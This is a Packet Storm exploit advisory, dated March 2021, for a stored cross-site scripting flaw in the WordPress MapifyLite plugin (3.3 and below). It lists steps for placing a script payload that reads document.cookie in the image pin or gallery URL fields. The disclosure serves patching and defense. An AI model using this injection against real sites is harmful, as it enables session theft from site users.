what you don't know can hurt you

WordPress MapifyLite 3.3 Cross Site Scripting

WordPress MapifyLite 3.3 Cross Site Scripting
Posted Mar 24, 2021
Authored by Eagle Eye

WordPress MapifyLife plugin versions 3.3 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | 12998cba1b9d742b2679ff6fcef76da7

WordPress MapifyLite 3.3 Cross Site Scripting

Change Mirror Download
#Title : MapifyLite Wordpress Plugins Stored XSS Injection
#Date : 24/03/2021
#Author : Eagle Eye
#Vendor Homepage : https://mapifypro.com/product/mapifylite/
#Version Affected : 3.3 and below
#Tested on : Google Chrome
#XSS vulnerability from Map settings & locations

#1. Login user
#2. Go to add map settins/locations
#3. Put XSS payload at image pin url / image gallery url

#payload
http://localhost/"><script>alert(document.cookie)</script>
Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    1 Files
  • 29
    Nov 29th
    11 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close